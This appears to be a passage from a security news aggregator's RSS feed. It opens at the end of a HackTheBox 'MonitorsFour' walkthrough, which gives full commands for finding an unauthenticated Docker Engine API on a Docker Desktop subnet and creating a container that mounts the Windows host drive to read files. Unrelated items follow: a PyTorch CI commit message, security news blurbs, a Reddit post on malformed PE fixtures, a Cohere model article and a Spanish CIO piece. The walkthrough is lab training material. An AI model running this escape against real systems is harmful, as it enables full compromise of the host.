172.18.255.255 scope global eth0</pre><p>The container was connected to the 172.18.0.0/16 Docker bridge network. I then checked the routing table to identify the gateway address.</p><pre>www-data@821fbd6a43fa:~/html/cacti$ ip route<br>default via 172.18.0.1 dev eth0<br>172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.2</pre><p>A common Docker escape technique is abusing an exposed Docker API on port 2375. I first tested the bridge gateway:</p><pre>www-data@821fbd6a43fa:~/html/cacti$ curl http://172.18.0.1:2375/version<br>curl: (7) Failed to connect to 172.18.0.1 port 2375</pre><p>Nothing was listening there. Next, I tried host.docker.internal, which is commonly available in Docker Desktop environments and resolves back to the host system.</p><pre>www-data@821fbd6a43fa:~/html/cacti$ curl -v http://host.docker.internal:2375/version<br>* Host host.docker.internal:2375 was resolved.<br>* IPv4: 192.168.65.254<br>* Trying 192.168.65.254:2375...<br>* connect to 192.168.65.254 port 2375 failed: Connection refused</pre><p>Although the API was not exposed on .254, the response revealed an important detail: Docker Desktop was using the 192.168.65.0/24 internal subnet. That meant the Docker Engine API could still be exposed somewhere else on that range.</p><p>I also checked whether the Docker socket was mounted inside the container:</p><pre>www-data@821fbd6a43fa:~/html/cacti$ ls -la /var/run/docker.sock 2&gt;/dev/null</pre><pre>www-data@821fbd6a43fa:~/html/cacti$ find / -name "docker.sock" 2&gt;/dev/null</pre><p>No socket was present, so I moved on to scanning the subnet manually for port 2375.</p><pre>www-data@821fbd6a43fa:~/html/cacti$ for i in $(seq 1 254); do<br>(curl -s --connect-timeout 1 http://192.168.65.$i:2375/version 2&gt;/dev/null | grep -q "ApiVersion" &amp;&amp; echo "192.168.65.$i:2375 OPEN") &amp;<br>done; wait</pre><p>The scan returned a valid Docker API endpoint:</p><pre>192.168.65.7:2375 OPEN</pre><p>I confirmed access and retrieved the Docker version information.</p><pre>www-data@821fbd6a43fa:~/html/cacti$ curl http://192.168.65.7:2375/version</pre><pre>{<br>  "Platform": {"Name": "Docker Engine - Community"},<br>  "Version": "28.3.2",<br>  "ApiVersion": "1.51",<br>  "KernelVersion": "6.6.87.2-microsoft-standard-WSL2",<br>  "Os": "linux",<br>  "Arch": "amd64"<br>}</pre><p>The API was completely unauthenticated, allowing arbitrary interaction with the Docker daemon from inside the container.</p><h4>Exploitation</h4><p>To create a new container, I first checked which images were already available on the host.</p><pre>www-data@821fbd6a43fa:~/html/cacti$ curl -s http://192.168.65.7:2375/images/json | grep -o '"RepoTags":\[[^]]*\]'</pre><pre>"RepoTags":["docker_setup-nginx-php:latest"]<br>"RepoTags":["docker_setup-mariadb:latest"]<br>"RepoTags":["alpine:latest"]</pre><p>Since alpine:latest already existed, I used it to create a malicious container that mounted the host filesystem. On my attacking machine, I prepared a JSON payload defining the container configuration.</p><pre>cat &gt; /tmp/container.json &lt;&lt; 'EOF'<br>{<br>  "Image": "alpine:latest",<br>  "Cmd": ["/bin/sh", "-c", "cat /mnt/host_root/Users/Administrator/Desktop/root.txt"],<br>  "HostConfig": {<br>    "Binds": ["/mnt/host/c:/mnt/host_root"]<br>  },<br>  "Tty": true,<br>  "OpenStdin": true<br>}<br>EOF</pre><p>The important part was the bind mount:</p><pre>"Binds": ["/mnt/host/c:/mnt/host_root"]</pre><p>Docker Desktop exposes the Windows host filesystem through /mnt/host/c inside WSL2. By mounting it into the new container, I could directly access files from the host operating system.</p><p>I then served the payload locally:</p><pre>alhamrizvi@alhams-fedora:/mf$ cd /tmp &amp;&amp; python3 -m http.server 8000</pre><p>Inside the compromised container, I downloaded the configuration file.</p><pre>www-data@821fbd6a43fa:~/html/cacti$ curl http://10.10.14.36:8000/container.json -o /tmp/container.json</pre><p>Next, I created the malicious container through the Docker API.</p><pre>www-data@821fbd6a43fa:~/html/cacti$ curl -X POST \<br>-H "Content-Type: application/json" \<br>-d @/tmp/container.json \<br>http://192.168.65.7:2375/containers/create?name=pwned</pre><pre>{"Id":"7d99df11ee0f9d29c093acb26f741bebda84e7d02c90097590c0791241075468","Warnings":[]}</pre><p>After creating the container, I started it:</p><pre>www-data@821fbd6a43fa:~/html/cacti$ curl -X POST \<br>http://192.168.65.7:2375/containers/7d99df11ee0f/start</pre><p>Finally, I retrieved the container logs, which contained the contents of root.txt from the Windows host.</p><pre>www-data@821fbd6a43fa:~/html/cacti$ curl \<br>http://192.168.65.7:2375/containers/7d99df11ee0f/logs?stdout=true<br>REDACTED</pre><p>The exposed Docker API allowed full interaction with the Docker daemon, leading directly to host filesystem access and complete compromise of the machine.</p><p>And Congrats, you have rooted the machine i guess!</p><p>bye bye!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=3862c72c498f" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/monitorsfour-htb-hackthebox-walkthrough-by-alham-rizvi-3862c72c498f">MonitorsFour HTB — HackTheBox Walkthrough | By Alham Rizvi</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Department of Know: Google’s CodeMender, CISA’s big leak, Torvalds open-source warning]]></title>
<description><![CDATA[This week’s Department of Know is hosted by Rich Stroffolino, with guests Kathleen Mullin, former CISO, MyCareGorithm, and Nick Espinosa, host, Deep Dive Radio Show. Missed the live show? Check it out on YouTube. The Department of Know is live every Friday at 4:00 p.m. ET.…
Read more →
The post T...]]></description>
<link>https://tsecurity.de/de/3540818/it-security-nachrichten/the-department-of-know-googles-codemender-cisas-big-leak-torvalds-open-source-warning/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3540818/it-security-nachrichten/the-department-of-know-googles-codemender-cisas-big-leak-torvalds-open-source-warning/</guid>
<pubDate>Fri, 22 May 2026 23:38:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This week’s Department of Know is hosted by Rich Stroffolino, with guests Kathleen Mullin, former CISO, MyCareGorithm, and Nick Espinosa, host, Deep Dive Radio Show. Missed the live show? Check it out on YouTube. The Department of Know is live every Friday at 4:00 p.m. ET.…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/the-department-of-know-googles-codemender-cisas-big-leak-torvalds-open-source-warning/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/the-department-of-know-googles-codemender-cisas-big-leak-torvalds-open-source-warning/">The Department of Know: Google’s CodeMender, CISA’s big leak, Torvalds open-source warning</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[trunk/729ccceb819f20a344284ecf09cc8b063ea69a21: Migrate docker-builds workflow to OSDC with remote BuildKit (#184664)]]></title>
<description><![CDATA[Two related changes to docker-builds.yml:


Migrate the full .ci/docker/** image matrix to OSDC ARC runners.
The orchestrator runs on a small mt-l-x86iavx512-2-4 runner inside
ghcr.io/actions/actions-runner:latest; the actual build is
offloaded to the cluster's remote BuildKit pools. BuildKit is ...]]></description>
<link>https://tsecurity.de/de/3538872/downloads/trunk729ccceb819f20a344284ecf09cc8b063ea69a21-migrate-docker-builds-workflow-to-osdc-with-remote-buildkit-184664/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3538872/downloads/trunk729ccceb819f20a344284ecf09cc8b063ea69a21-migrate-docker-builds-workflow-to-osdc-with-remote-buildkit-184664/</guid>
<pubDate>Fri, 22 May 2026 10:46:22 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Two related changes to docker-builds.yml:</p>
<ol>
<li>
<p>Migrate the full <code>.ci/docker/**</code> image matrix to OSDC ARC runners.<br>
The orchestrator runs on a small <code>mt-l-x86iavx512-2-4</code> runner inside<br>
<code>ghcr.io/actions/actions-runner:latest</code>; the actual build is<br>
offloaded to the cluster's remote BuildKit pools. BuildKit is a<br>
remote builder, so a single x86 orchestrator can drive both amd64<br>
and arm64 builds -- only the <code>buildkit_addr</code> differs per matrix row.</p>
<p>Auth model:</p>
<ul>
<li>ECR: reuses <code>pytorch/pytorch/.github/actions/ecr-login@main</code>,<br>
which falls through to OIDC on OSDC pods (no EC2 instance profile,<br>
no IRSA on the <code>arc-runner</code> ServiceAccount). We pass<br>
<code>aws-role-to-assume: arn:aws:iam::308535385114:role/arc</code>; a<br>
companion change in pytorch-gha-infra grants that role the ECR<br>
write actions on the <code>pytorch/ci-image</code> repository.</li>
<li>GHCR: unchanged (GHCR_PAT under the <code>docker-build</code> environment,<br>
gated on push events).</li>
</ul>
<p>Dropped:</p>
<ul>
<li><code>pytorch/test-infra/.github/actions/calculate-docker-image</code> and<br>
<code>pull-docker-image</code>: the tag is just <code>git rev-parse HEAD:.ci/docker</code>,<br>
computed inline.</li>
<li><code>chown-workspace</code>, the legacy <code>ecr-login</code> composite step, and the<br>
<code>nick-fields/retry</code> wrapper for the GHCR push -- <code>docker buildx imagetools create</code> is a one-shot server-side cross-registry copy.</li>
</ul>
<p><code>.ci/docker/build.sh</code> learns one knob, <code>REMOTE_BUILDKIT</code>. When set,<br>
it swaps <code>--load -t &lt;tmp&gt;</code> for <code>--push</code> (remote builders cannot load<br>
into a non-existent local daemon) and skips the post-build<br>
<code>drun</code>-based sanity checks. The EC2 / local-daemon path is unchanged.</p>
<p><code>.github/actionlint.yaml</code> learns the new <code>mt-l-x86iavx512-2-4</code><br>
self-hosted runner label.</p>
</li>
<li>
<p>Add a <code>ciflow/docker</code> tag trigger, mirroring how trunk.yml uses<br>
<code>ciflow/trunk/*</code>. Pushing a <code>ciflow/docker/&lt;sha&gt;</code> tag to any commit<br>
force-builds the matrix on that commit -- useful for testing<br>
Dockerfile edits without an open PR, or for re-running a build that<br>
failed transiently. The existing <code>paths:</code> filter on <code>push:</code> is<br>
removed because GitHub AND-combines <code>tags</code> with <code>paths</code>, which would<br>
silently block ciflow pushes on commits that didn't already touch<br>
<code>.ci/docker</code>. PR-side path filtering is preserved.</p>
</li>
</ol>
<p>Authored by Claude.<br>
Pull Request resolved: <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4492202616" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/184664" data-hovercard-type="pull_request" data-hovercard-url="/pytorch/pytorch/pull/184664/hovercard" href="https://github.com/pytorch/pytorch/pull/184664">#184664</a><br>
Approved by: <a href="https://github.com/jeanschmidt">https://github.com/jeanschmidt</a>, <a href="https://github.com/malfet">https://github.com/malfet</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[trunk/3df983ce80ed6a6d81579f3964e5d53787483bed: Migrate docker-builds workflow to OSDC with remote BuildKit (#184664)]]></title>
<description><![CDATA[Two related changes to docker-builds.yml:


Migrate the full .ci/docker/** image matrix to OSDC ARC runners.
The orchestrator runs on a small mt-l-x86iavx512-2-4 runner inside
ghcr.io/actions/actions-runner:latest; the actual build is
offloaded to the cluster's remote BuildKit pools. BuildKit is ...]]></description>
<link>https://tsecurity.de/de/3538177/downloads/trunk3df983ce80ed6a6d81579f3964e5d53787483bed-migrate-docker-builds-workflow-to-osdc-with-remote-buildkit-184664/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3538177/downloads/trunk3df983ce80ed6a6d81579f3964e5d53787483bed-migrate-docker-builds-workflow-to-osdc-with-remote-buildkit-184664/</guid>
<pubDate>Fri, 22 May 2026 04:02:36 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Two related changes to docker-builds.yml:</p>
<ol>
<li>
<p>Migrate the full <code>.ci/docker/**</code> image matrix to OSDC ARC runners.<br>
The orchestrator runs on a small <code>mt-l-x86iavx512-2-4</code> runner inside<br>
<code>ghcr.io/actions/actions-runner:latest</code>; the actual build is<br>
offloaded to the cluster's remote BuildKit pools. BuildKit is a<br>
remote builder, so a single x86 orchestrator can drive both amd64<br>
and arm64 builds -- only the <code>buildkit_addr</code> differs per matrix row.</p>
<p>Auth model:</p>
<ul>
<li>ECR: reuses <code>pytorch/pytorch/.github/actions/ecr-login@main</code>,<br>
which falls through to OIDC on OSDC pods (no EC2 instance profile,<br>
no IRSA on the <code>arc-runner</code> ServiceAccount). We pass<br>
<code>aws-role-to-assume: arn:aws:iam::308535385114:role/arc</code>; a<br>
companion change in pytorch-gha-infra grants that role the ECR<br>
write actions on the <code>pytorch/ci-image</code> repository.</li>
<li>GHCR: unchanged (GHCR_PAT under the <code>docker-build</code> environment,<br>
gated on push events).</li>
</ul>
<p>Dropped:</p>
<ul>
<li><code>pytorch/test-infra/.github/actions/calculate-docker-image</code> and<br>
<code>pull-docker-image</code>: the tag is just <code>git rev-parse HEAD:.ci/docker</code>,<br>
computed inline.</li>
<li><code>chown-workspace</code>, the legacy <code>ecr-login</code> composite step, and the<br>
<code>nick-fields/retry</code> wrapper for the GHCR push -- <code>docker buildx imagetools create</code> is a one-shot server-side cross-registry copy.</li>
</ul>
<p><code>.ci/docker/build.sh</code> learns one knob, <code>REMOTE_BUILDKIT</code>. When set,<br>
it swaps <code>--load -t &lt;tmp&gt;</code> for <code>--push</code> (remote builders cannot load<br>
into a non-existent local daemon) and skips the post-build<br>
<code>drun</code>-based sanity checks. The EC2 / local-daemon path is unchanged.</p>
<p><code>.github/actionlint.yaml</code> learns the new <code>mt-l-x86iavx512-2-4</code><br>
self-hosted runner label.</p>
</li>
<li>
<p>Add a <code>ciflow/docker</code> tag trigger, mirroring how trunk.yml uses<br>
<code>ciflow/trunk/*</code>. Pushing a <code>ciflow/docker/&lt;sha&gt;</code> tag to any commit<br>
force-builds the matrix on that commit -- useful for testing<br>
Dockerfile edits without an open PR, or for re-running a build that<br>
failed transiently. The existing <code>paths:</code> filter on <code>push:</code> is<br>
removed because GitHub AND-combines <code>tags</code> with <code>paths</code>, which would<br>
silently block ciflow pushes on commits that didn't already touch<br>
<code>.ci/docker</code>. PR-side path filtering is preserved.</p>
</li>
</ol>
<p>Authored by Claude.<br>
Pull Request resolved: <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4492202616" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/184664" data-hovercard-type="pull_request" data-hovercard-url="/pytorch/pytorch/pull/184664/hovercard" href="https://github.com/pytorch/pytorch/pull/184664">#184664</a><br>
Approved by: <a href="https://github.com/jeanschmidt">https://github.com/jeanschmidt</a>, <a href="https://github.com/malfet">https://github.com/malfet</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CISA chief frets about open-source vulnerabilities, delayed security improvements]]></title>
<description><![CDATA[Acting director Nick Andersen’s comments came as a wave of malware attacks hit tech that’s publicly available for collaboration.
The post CISA chief frets about open-source vulnerabilities, delayed security improvements appeared first on CyberScoop.]]></description>
<link>https://tsecurity.de/de/3537337/it-security-nachrichten/cisa-chief-frets-about-open-source-vulnerabilities-delayed-security-improvements/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3537337/it-security-nachrichten/cisa-chief-frets-about-open-source-vulnerabilities-delayed-security-improvements/</guid>
<pubDate>Thu, 21 May 2026 19:23:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Acting director Nick Andersen’s comments came as a wave of malware attacks hit tech that’s publicly available for collaboration.</p>
<p>The post <a href="https://cyberscoop.com/cisa-chief-frets-about-open-source-vulnerabilities-delayed-security-improvements/">CISA chief frets about open-source vulnerabilities, delayed security improvements</a> appeared first on <a href="https://cyberscoop.com/">CyberScoop</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[99 malformed PE fixtures: exploring loader edge‑cases and parser breakpoints]]></title>
<description><![CDATA[I’ve been working on a set of 99 malformed PE fixtures that target structural edge‑cases in the Windows loader and common PE parsers. These aren’t exploit payloads — they’re structural anomalies designed to expose how different tools behave when the PE format gets weird. Examples of anomalies in ...]]></description>
<link>https://tsecurity.de/de/3536494/malware-trojaner-viren/99-malformed-pe-fixtures-exploring-loader-edgecases-and-parser-breakpoints/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3536494/malware-trojaner-viren/99-malformed-pe-fixtures-exploring-loader-edgecases-and-parser-breakpoints/</guid>
<pubDate>Thu, 21 May 2026 15:18:27 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I’ve been working on a set of <strong>99 malformed PE fixtures</strong> that target structural edge‑cases in the Windows loader and common PE parsers. These aren’t exploit payloads — they’re structural anomalies designed to expose how different tools behave when the PE format gets weird.</p> <p><strong>Examples of anomalies in the set</strong></p> <ul> <li>sections with impossible flag combinations </li> <li>RVA ranges that overlap or point nowhere </li> <li>entrypoints in headers or overlays </li> <li>broken import descriptors </li> <li>malformed resource directories </li> <li>zero‑length sections with RWX flags </li> <li>entropy‑based obfuscation hints </li> <li>directory entries that contradict the optional header </li> </ul> <p><strong>Why this matters for exploit dev</strong></p> <p>A surprising number of tools:</p> <ul> <li>mis‑map sections </li> <li>mis‑calculate image size </li> <li>trust invalid directory entries </li> <li>or crash outright </li> </ul> <p>Understanding these behaviours is useful when you’re:</p> <ul> <li>crafting weird binaries </li> <li>exploring loader inconsistencies </li> <li>building polyglots </li> <li>or fuzzing PE‑aware components </li> </ul> <p><strong>If people want it</strong></p> <p>I can post:</p> <ul> <li>the full anomaly list </li> <li>the behaviour matrix across tools </li> <li>the fixtures themselves </li> <li>or a breakdown of which anomalies cause which failures </li> </ul> <p>Let me know if this is the kind of thing you want to see more of.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/iocx_dev"> /u/iocx_dev </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1tjf9gc/99_malformed_pe_fixtures_exploring_loader/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1tjf9gc/99_malformed_pe_fixtures_exploring_loader/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cohere cracks lossless quantization and native citations with first full Apache 2.0 licensed open model Command A+]]></title>
<description><![CDATA[Canadian AI lab Cohere made waves recently by announcing a merger with German AI startup Aleph Alpha, but now it has even more in store for enterprise builders around the globe: today, the firm co-founded by former Googler and "Attention Is All You Need" co-author Aidan Gomez unveiled Command A+,...]]></description>
<link>https://tsecurity.de/de/3534565/it-nachrichten/cohere-cracks-lossless-quantization-and-native-citations-with-first-full-apache-20-licensed-open-model-command-a/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3534565/it-nachrichten/cohere-cracks-lossless-quantization-and-native-citations-with-first-full-apache-20-licensed-open-model-command-a/</guid>
<pubDate>Thu, 21 May 2026 00:02:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Canadian AI lab <a href="https://cohere.com/">Cohere</a> made waves recently by <a href="https://cohere.com/blog/cohere-alephalpha-join-forces">announcing a merger with German AI startup Aleph Alpha</a>, but now it has even more in store for enterprise builders around the globe: today, the firm <a href="https://venturebeat.com/ai/openai-rival-cohere-ai-has-flown-under-the-radar-that-may-be-about-to-change">co-founded by former Googler and "Attention Is All You Need" co-author Aidan Gomez</a> unveiled <a href="https://cohere.com/blog/command-a-plus">Command A+</a>, a highly optimized, 218-billion-parameter language model engineered specifically for complex reasoning, multimodal document processing, and agentic workflows.</p><p>The most significant aspect of the release is not just the model’s capabilities; it is its accessibility. </p><p>By releasing the model weights free on the <a href="https://huggingface.co/CohereLabs/command-a-plus-05-2026-w4a4">popular AI code sharing repository Hugging Face</a> under a <a href="https://x.com/aidangomez/status/2057142232860258527">highly permissive Apache 2.0 open-source license</a> — a first for the company, according to <a href="https://x.com/aidangomez/status/2057142232860258527?s=20">a post by Gomez, now Cohere's CEO, on X</a> — Cohere is making a calculated bet on "sovereign AI"—the thesis that enterprises, governments, and developers should have the ability to run, control, and adapt frontier-grade AI entirely within their own secure environments, without sacrificing performance.</p><h2><b>Sparse architecture with extreme quantization</b></h2><p>At the architectural level, Command A+ represents a major evolution from Cohere’s previous dense models. It is a decoder-only Sparse Mixture-of-Experts (MoE) Transformer. </p><p>While the model houses a relatively modest 218 billion total parameters, even fewer — only 25 billion — are active during any given generation step. It's a much lighter footprint and requires far less compute resources to run in inference (serving the model in production environments to end users or via agents) than the proprietary U.S. giants like OpenAI's GPT-5.5 and Anthropic's Claude Opus 4.7, which are <a href="https://www.linkedin.com/posts/zainhas_a-viral-ai-paper-last-week-claimed-gpt-55-activity-7456465306660749312-5EmU">estimated by third-party observers to be in the trillions of parameters.</a> </p><p>This sparse architecture is the key to the model’s efficiency. In plain terms, an MoE model routes incoming queries only to the specific "expert" neural networks best suited to handle them, leaving the rest of the model dormant.</p><p>This is a familiar formulation and one followed by most leading LLMs these days, allowing models to retain the vast knowledge base and nuanced reasoning capabilities of a giant, but at the faster speeds and reduced compute and energy requirements of a much smaller model, since only a fraction of parameters are ever activated at any time. </p><p>But where Cohere has taken an extra step beyond most for Command A+ is that it has focused heavily on hardware efficiency through quantization—a process that compresses the model's memory footprint by reducing the <i>precision</i> of its parameters. </p><p>Command A+ is available in 16-bit (BF16), 8-bit (FP8), and a highly compressed 4-bit (W4A4) format.</p><p>The W4A4 quantization is the technical centerpiece of this release. Typically, reasoning models suffer an outsized "quantization tax," where compressing the model leads to visible regressions in complex problem-solving. </p><p><b>Cohere mitigated this by only quantizing the MoE experts to 4-bit, </b>while<b> keeping the critical attention pathways at full precision, </b>supplemented by a technique called Quantization-Aware Distillation.</p><p>The result is a <b>nearly lossless compression </b>that allows this massive model to run on a single NVIDIA Blackwell B200 GPU or just two NVIDIA H100 GPUs.</p><p>The speed gains are equally notable. According to performance data released by the company, the W4A4 quantization at low concurrency achieves 375 tokens per second (TOPS) with a Time-to-First-Token (TTFT) latency of just 113 milliseconds—representing up to a 63% increase in output speed and a 17% reduction in latency compared to the previous Command A Reasoning model.</p><p>Furthermore, Cohere has overhauled the model's tokenizer. Tokenizers break text down into the fragments that AI models process. The new tokenizer is highly optimized for global enterprise use, featuring native support for 48 languages. </p><p>More importantly, it <b>dramatically improves tokenization efficiency for non-European languages,</b> reducing the number of tokens required to generate responses in Arabic by 20%, Japanese by 18%, and Korean by 16%. Because inference costs are calculated per token, this translates directly to lower operational costs for global, multilingual or non-English deployments.</p><h2><b>Agentic workflows and high benchmarks on math, specialized fields</b></h2><p>While raw speed and size dictate deployment, a model’s utility is defined by its product capabilities. Command A+ was built specifically for "agentic" tasks — workflows where the AI operates autonomously or semi-autonomously, uses external tools, queries databases, and synthesizes information across multiple steps.</p><p>The benchmark leaps over the previous generation are stark. </p><p>On 𝜏²-Bench Telecom, which tests complex reasoning, the model jumped from a 37% score to 85%. On Terminal-Bench Hard, which measures agentic coding performance, it climbed from 3% to 25%. In complex mathematics, it scored 90% on AIME 25, up from 57%.</p><p>Command A+ punches above its weight class (25B active parameters) in pure reasoning and mathematics, competing directly with much larger models like DeepSeek V4 Pro on math benchmarks. However, for deep agentic coding and general broad-scale intelligence indexing, it currently trails behind the latest generations from Chinese open source rivals like <a href="https://venturebeat.com/technology/deepseek-v4-arrives-with-near-state-of-the-art-intelligence-at-1-6th-the-cost-of-opus-4-7-gpt-5-5">DeepSeek</a>, <a href="https://venturebeat.com/technology/ai-joins-the-8-hour-work-day-as-glm-ships-5-1-open-source-llm-beating-opus-4">Z.ai (GLM)</a>, and <a href="https://venturebeat.com/technology/new-minimax-m2-7-proprietary-ai-model-is-self-evolving-and-can-perform-30-50">MiniMax</a>.</p><p>That said, comparing them directly ignores Cohere's core value proposition: <b>hardware efficiency</b>.</p><p>Beyond the benchmarks, Command A+ introduces deep integrations for enterprise trust and verification. The model supports conversational tool use via standard chat templates, allowing developers to connect it seamlessly to internal APIs, search engines, or SQL databases.</p><p>Crucially,<b> Command A+ features native citation generation. </b>When Command A+ retrieves information from an external tool, it doesn't just synthesize the answer; it generates explicit "grounding spans." Using special tags embedded in the output, the <b>model directly links every factual claim it makes to the specific source document or database row</b> it pulled the information from. </p><p><b>For enterprises heavily regulated industries like finance, healthcare, or legal, this traceability is the difference between an interesting prototype and a production-ready application.</b> If a user asks for a daily sales report, the model will output the total sales amount and explicitly cite the database query result that provided that number, minimizing the risk of undetected hallucinations.</p><p>Additionally, Command A+ is fully multimodal, capable of processing both text and images natively within its massive 128K input context window, making it highly effective for complex document processing, such as analyzing scanned invoices, charts, or technical manuals.</p><h2><b>The first fully Apache 2.0 licensed Cohere AI model</b></h2><p>In the current AI landscape, "open source" has become a fraught term. Many leading AI companies release their model weights under restrictive commercial licenses or acceptable use policies that explicitly forbid large enterprises from using the models for commercial purposes, or prohibit the models from being used to train competing AI systems.</p><p>Indeed, Cohere's prior models, including<a href="https://venturebeat.com/ai/cohere-releases-powerful-command-r-language-model-for-enterprise-use"> Command R </a>and <a href="https://venturebeat.com/ai/cohere-launches-command-r-a-powerful-llm-optimized-for-enterprise-ai">Command R+</a>, were released under a CC-BY-NC 4.0 (Creative Commons NonCommercial) license. While their model weights were open for researchers and developers to download, tinker with, and evaluate, they were strictly prohibited from being used for commercial purposes without purchasing a separate enterprise license from Cohere or going through its application programming interface (API), similar to the arrangement many enterprises use for accessing AI models from OpenAI, Anthropic, Google and other leading labs.</p><p>Cohere has changed up its approach by releasing Command A+ under the Apache 2.0 license. This is a critical distinction for the developer community. Apache 2.0 is a true, OSI-approved open-source license. It allows anyone—from independent developers to Fortune 500 corporations—to use, modify, distribute, and commercialize the model without paying licensing fees or adhering to restrictive non-compete clauses.</p><p>As <a href="https://x.com/aidangomez/status/2057198038616007097?s=20">Gomez wrote on X</a>, the decision was championed by fellow Cohere co-founder Nick Frosst, who posted a two-minute long overview calling it "the best model we've ever put out."</p><div></div><p>For the enterprise, this license means total vendor independence. A company can download the Command A+ weights, fine-tune them on highly classified internal data, and deploy them on their own private servers or air-gapped networks. They are not tethered to Cohere’s infrastructure, pricing changes, or API uptime. It is the ultimate realization of sovereign AI.</p><p>The release was met with immediate traction across the AI developer ecosystem, driven heavily by its day-one integration with major open-source inference frameworks like Hugging Face and vLLM.</p><h2><b>What's next?</b></h2><p>The release of Command A+ marks a maturing of the open-source AI ecosystem. By combining frontier-level reasoning, robust agentic tool use, and multimodal capabilities with an architecture specifically designed for hardware efficiency, Cohere is changing the calculus for enterprise AI adoption.</p><p>The requirement of massive, centralized compute clusters has long been a bottleneck for companies prioritizing data privacy and cost control. By democratizing access to a model of this caliber under a true open-source license, Cohere has provided the enterprise market with exactly what it has been asking for: the power of the cloud, capable of running securely in the server room down the hall.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Seis claves para que los CIO diversifiquen sus capacidades de liderazgo]]></title>
<description><![CDATA[Dsempeñar un gran trabajo en el puesto actual es lo mínimo exigible para los CIO modernos. Los líderes digitales más exitosos adoptan nuevos retos tanto dentro de su organización como en nuevos entornos de trabajo, y dado que los estudios sitúan la permanencia media en un puesto de liderazgo digi...]]></description>
<link>https://tsecurity.de/de/3533615/it-nachrichten/seis-claves-para-que-los-cio-diversifiquen-sus-capacidades-de-liderazgo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3533615/it-nachrichten/seis-claves-para-que-los-cio-diversifiquen-sus-capacidades-de-liderazgo/</guid>
<pubDate>Wed, 20 May 2026 17:33:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Dsempeñar un gran trabajo en el puesto actual es lo mínimo exigible para los CIO modernos. Los líderes digitales más exitosos adoptan nuevos retos tanto dentro de su organización como en nuevos entornos de trabajo, y dado que los estudios sitúan la permanencia media en un puesto de liderazgo digital en unos cinco años, la capacidad de pasar sin fricciones a nuevas oportunidades nunca ha sido tan crucial.</p>



<p>Las evidencias también sugieren que los CIO que piensan fuera de lo convencional y se mueven entre puestos, empresas e industrias desarrollan mejor sus habilidades de liderazgo y generan beneficios para sus equipos, sus organizaciones y sus clientes finales. Desde la generación de soluciones innovadoras hasta la adaptación a diferentes culturas, estos son ejemplos de seis sectores concretos que muestran cómo las experiencias diversas ayudan a enriquecer las habilidades de liderazgo de los CIO.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h3 class="wp-block-heading">1. Fórmula 1: centrarse en el trabajo en equipo genera soluciones innovadoras</h3>



<p>Dan Keyworth, director ejecutivo de tecnología de rendimiento y sistemas en McLaren Racing, afirma que liderar la tecnología en el vertiginoso mundo de la Fórmula 1 le ha permitido desarrollar nuevas habilidades. “Al estar en un entorno de alta intensidad, aprendes cómo las herramientas que proporcionas a las personas generan un impacto tangible”, afirma. “En algunas organizaciones donde las operaciones son un poco más lentas, la gente no entiende el impacto real que tiene la tecnología”.</p>



<p>Keyworth señala que el éxito en la F1 consiste en usar los datos para encontrar una ventaja competitiva. Tras pasar nueve años en el especialista tecnológico Fujitsu, se incorporó a McLaren en 2017. Y durante su tiempo en el automovilismo, McLaren ha seguido mejorando en la pista, culminando en los éxitos de la pasada temporada, cuando el equipo ganó el campeonato de constructores y Lando Norris consiguió su primer título de pilotos.</p>



<p>“Ha sido un viaje increíble para mí, porque a medida que hemos ido subiendo posiciones, me he dado cuenta de lo crítica que es nuestra tecnología y de dónde están las oportunidades para evolucionar y desarrollarla”, cuenta.</p>



